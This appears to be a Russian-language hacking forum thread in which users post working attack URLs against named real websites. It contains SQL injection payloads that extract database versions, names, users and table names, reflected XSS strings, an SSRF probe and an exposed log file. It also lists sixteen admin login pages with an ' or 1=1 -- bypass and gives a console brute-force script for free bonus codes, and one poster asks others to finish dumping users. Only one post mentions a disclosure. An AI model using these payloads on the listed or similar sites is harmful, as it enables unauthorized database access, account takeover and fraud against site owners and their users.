Уязвимости SQLi, XSS и другие.

Code:

http://supersleep.ru/?ITEM_ID=2776+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

5.5.43-0+deb7u1

 

Code:

http://www.dutchaero.nl/index.php?catid=13+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6

 

_ttp://www.artrussia.ru/artists/artist_s.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16 and '0'='0

 

Code:

http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28%29,7--+-

5.0.83

Code:

http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28%29,7--+-

teamboad

Code:

http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29,7--+-

[email protected]

 

Может запретить такие ссылки?
Тема вроде для публикация лично найдены уязвимостей, а [t] подставляет софт.
Человек закинул ссылки в программу и она кучей их проверяет.
При публикации даже [t] не убирают.

 

https://site.ua/search/?searchStrin...al(name)+background=javascript:eval(name)//>"

 

Там вроде и фильтров нету...

 

<script>alert()</script>

фильтрует

 

https://site.ua/search/?searchString=</title><script>alert()</script>
Не фильтрует

 

http://vic.md/ro/notebook/list/all/...VERSION(),225,26,27,28,29,30,31,32+AND+(1)=(1

Дальше не смог вывести пользователеи.В ЛС кто сделает это )

 

PHP:

http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 81,1),0x3a,floor(rand(0)*2))y from information_schema.tables  group by y ) x)+AND+(1)=(1 #   

AND+(1)=(1 это не нужно. Просто 9999 без )

 

http://takky-shop.ru/images/img/log.txt
Открытый лог .
Reflected XSS

Code:

http://takky-shop.ru/category/"><script>alert()</script>

Code:

http://takky-shop.ru/search

в поисковике тоже XSS .

 

10minutemail.com
XSS

Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)

 

Да эти ХСС даже уязвимостью назвать нельзя

https://www.crazymailing.com хсс

 

Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
Первое, авторизовываемся не через телефон, а средствами забытого пароля:

Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.

Далее тупо перебираем скриптом в консоле

Code:

for (var i = 800000; i < 800100; i++) { $('.bonus-text').val(i); $('.bonus-send').click(); }

Что интересно под авторизацией через телефон дает только три попытки, а через средство забытого пароля без ввода телефона - без проблем сколько угодно, связано скорее всего с куками.
Ну и профитик

Репорт отправлен и на момент написания статьи уже пофикшено. А добрые ребятки отправили мне в благодарность много бесплатных кодов.

 

http://newipnow.com/
в ПОЛЕ URL В ВОДИМ 127.0.0.1:3306
S.S.R.F.

 

http://new-semkino.ru/cp/login
http://rio-holding.ru/cp/login
http://stzem.ru/cp/login
http://buro.moscow/cp/login
http://rek-on.ru/cp/login
http://kolomnalnd.ru/cp/login
http://vodny-2.ru/cp/login
http://kutuzovo.club/cp/login
http://2112211.ru/cp/login
http://serveing.ru/cp/login
http://svus.ru/cp/login/
http://galilei-house.ru/cp/login
http://www.smartlab.ru/cp/login
http://l-vm.ru/cp/login
http://gavangroup.ru/cp/login
http://an-megapolis.ru/cp/login
В Логине " or 1=1 --

 

http://golden-bird.biz/signup

Code:

login="><script>alert(/xss/)</script>&[email protected]&pass=password&repass=password